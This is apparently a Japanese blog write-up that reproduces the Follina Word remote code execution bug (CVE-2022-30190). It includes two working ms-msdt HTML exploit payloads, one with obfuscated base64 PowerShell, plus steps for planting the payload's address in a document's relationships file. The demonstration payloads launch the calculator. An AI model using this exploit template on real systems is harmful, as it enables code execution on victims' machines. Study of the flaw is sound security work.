
Microsoft Office Word Rce 再現 (CVE-2022-30190)
MS Office の docx ファイルには、HTML ファイルとして外部 OLE オブジェクト参照が含まれる可能性があります。ms-msdt: という HTML シナリオが存在し、msdt 診断ツールを呼び出して、任意のコードを実行できます(パラメータで指定)。
結果として、悪意のある docx ファイルを開くだけで(マクロを使用せずに)RCE を獲得できる恐ろしい攻撃ベクトルとなります。
Twitter で @nao_sec が最初に共有したサンプルを入手し、ダウンロードしました。

02-2022-0438.doc を圧縮ファイルとして開きます。

/word/_rels/document.xml.rels を開くと、下図のようになります。

OK、上図の下線部分に、hxxps://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html への外部参照が含まれていることがわかります。
元の悪意のある HTML アドレスは既に閉鎖されているため、@nao_sec が提供した悪意のある HTML ファイルをフォークして以下を作成しました。
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//繰り返し....
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNhbGMuZXhlIjtTdGFydC1Qcm9jZXNzICRjbWQ7'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>
</body>
</html>
なぜ先頭に大量のゴミデータが必要なのかというと、HTML ファイル全体を 4096 バイトにするためです。詳細な分析は https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug を参照してください。
上記の POC は POWERSHELL を実行するものですが、これを電卓に置き換えます。コードは以下の通りです。
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAA... 以下省略(翻訳不要)...
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe\"";
</script>
</body>
</html>
上記のコードをリモートサーバーに HTML 形式で保存し、/word/_rels/document.xml.rels 内の外部アドレスを自身のものに置き換えます。以下を参照。

最後に doc ファイルとして保存し、ダブルクリックして開くと以下のデモのようになります。
Tips:
リッチテキスト形式ファイル (.rtf) は、Windows エクスプローラーのプレビューウィンドウだけでこの脆弱性の呼び出しをトリガーできます。CVE-2021-40444 と非常によく似ており、これは「クリック」だけでなく、「ゼロクリック」トリガーによってもこの脅威の深刻さが拡大される可能性があります。
以下のデモを参照:
